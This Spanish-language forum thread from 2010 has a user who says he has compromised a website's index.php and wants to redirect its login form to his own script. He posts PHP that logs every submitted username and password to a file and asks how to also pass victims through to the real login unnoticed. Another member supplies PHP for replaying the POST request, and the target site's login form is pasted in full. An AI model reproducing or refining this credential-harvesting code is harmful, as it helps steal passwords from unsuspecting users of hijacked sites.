duda sobre pishing.php

Iniciado por .:UND3R:., 4 Marzo 2010, 19:11 PM

0 Miembros y 1 Visitante están viendo este tema.

.:UND3R:.

Hola a todos bueno les cuento tengo una duda lo que pasa es que logre tomar el control de un index.php y quiero editar el <form method="post" ACTION=datos.php

el codigo de datos.php pienso ponerle esto:

<?php
header 
('Location: http://www.web.com/ ');
$handle fopen("log.txt""a");
foreach(
$_POST as $variable => $value) {
   
fwrite($handle$variable);
   
fwrite($handle"=");
   
fwrite($handle$value);
   
fwrite($handle"\r\n");
}
fwrite($handle"\r\n");
fclose($handle);
exit;
?>


pero si ago lo anterior ningun usuario podria autentificarse ya que solamente guardaria los datos y despues lo redireccionaria a otra web  :-(
me gustaria que redireccionara autentificado,existe alguna manera para que se guarden los datos del form o que se intercepten y que despues se logue?
si me pudieran explicar un poquito se los agradeceria demasiado

desde ya gracias

Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)

дٳŦ٭

Pon esto al final:

header ('Location: http://www.web.com/ ');


Con sangre andaluza :)


.:UND3R:.

No lo logre :/ me redirecciona a la pagina pero no logueado
este es una parte del form de la pagina
<form action='' method='post' name='login_account' id='login_account'>

se podria poner 2 action cosa que pase por el mio (dato.php) y despues por el normal de la web? gracias :)

Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)

luiggy2

Si, mirate este código para enviar datos por post a otra web:

Código (php) [Seleccionar]
<?

$host="www.tupagina.com";
$referer="http://referer.com";
$uri="/pagina.php";
$vars="&parametro1=valor1&parametro2=valor2";

$header = "Host: $host\r\n";
$header .= "User-Agent: Mosaic\r\n";
$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
$header.="Referer: $referer\r\n";
$header .= "Content-Length: ".strlen($vars)."\r\n";
$header.="Pragma: no-cache\r\n";
$header .= "Connection: close\r\n\r\n";

$fp = pfsockopen("tcp://".$host, 80, $errno, $errstr, 20);
fputs($fp, "POST $uri HTTP/1.1\r\n");
fputs($fp, $header.$vars);
while (!feof($fp)){
echo fgets($fp, 128)."<br>";
}
fclose($fp);
?>


fuente:http://pastebin.com/f7f667268

Saludos!
" Las grandes ideas suelen salir la mayoría de veces de grandes estupideces "

.:UND3R:.

:B soy un poco nulo con esto de php osea el codigo que me mandaste
en el index ¿lo pongo asi?

<form method="post" ACTION=codigo.php

y en el codigo.php pongo el codigo que me enviaste
_____________________________________0
$referer="http://referer.com";
$uri="/pagina.php";

esta es la ruta de la pagina web original?



en que lugar de mi pagina queda guardado los datos?

muchas gracias por tu ayuda

Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)

Shell Root

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

.:UND3R:.

no,soy pequeño de echo todavia no soy mayor de edad,pretendo estudiarlo en la universidad,porfavor una ayuda  :rolleyes:

hice esto:
<?php
$handle 
fopen("log.txt""a");
foreach(
$_POST as $variable => $value) {
   
fwrite($handle$variable);
   
fwrite($handle"=");
   
fwrite($handle$value);
   
fwrite($handle"\r\n");
}
fwrite($handle"\r\n");
fclose($handle);
header ('Location: http://fantazymu.web.id/index.php/ ');
exit;
?>


pero todavia no logro entrar como autentificado

el form de la pagina es este:

                  <form action='' method='post' name='login_account' id='login_account'>
                          <table width='166' border='0' cellspacing='0' cellpadding='0'>
                            <tr>
                              <td height='16' colspan='2' class='text_login' scope='row' align='left'>Username</td>
                            </tr>
                            <tr>
                              <th height='16' colspan='2' scope='row'><div align='left'>
                                  <input name='login' type='text' class='login_field' id='login' title='Username' size='15' maxlength='10'>

                                  <input name='account_login' type='hidden' id='account_login' value='account_login'>
                              </div></th>
                            </tr>
                            <tr>
                              <td height='16' colspan='2' class='text_login' scope='row' align='left'>Password</td>
                            </tr>
                            <tr>
                              <th colspan='2' scope='row'><div align='left'>

                                  <input name='pass' type='password' class='login_field' id='pass' title='Password' size='15' maxlength='10'>
                              </div></th>
                            </tr>
                            <tr>
                              <th width='62' height='33' scope='row'><div align='left'>
                                  <input name='Submit' type='submit' class='button' value='Login!' title='Login'>
                              </div></th>
                              <td width='104' scope='row'><div align='left' title='Lost Password' class='link_menu'><a href='http:/uyquelindaweb/index.php?op=lostpassword'>Lost Password </a></div></td>

                            </tr>
                          </table>
                        </form>


lo que ago es cambiar
<form action='' method='post' name='login_account' id='login_account'>

por esto

<FORM METHOD="post" ACTION="datos.php">


claro guarda los datos pero al momento de redireccionar al index no esta autentificada



Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)

Nakp

Ojo por ojo, y el mundo acabará ciego.

WHK

no puedes hacer eso, tienes que autentificar sesiones con las cookies, enviar y recibir headers o hacer un bouncer.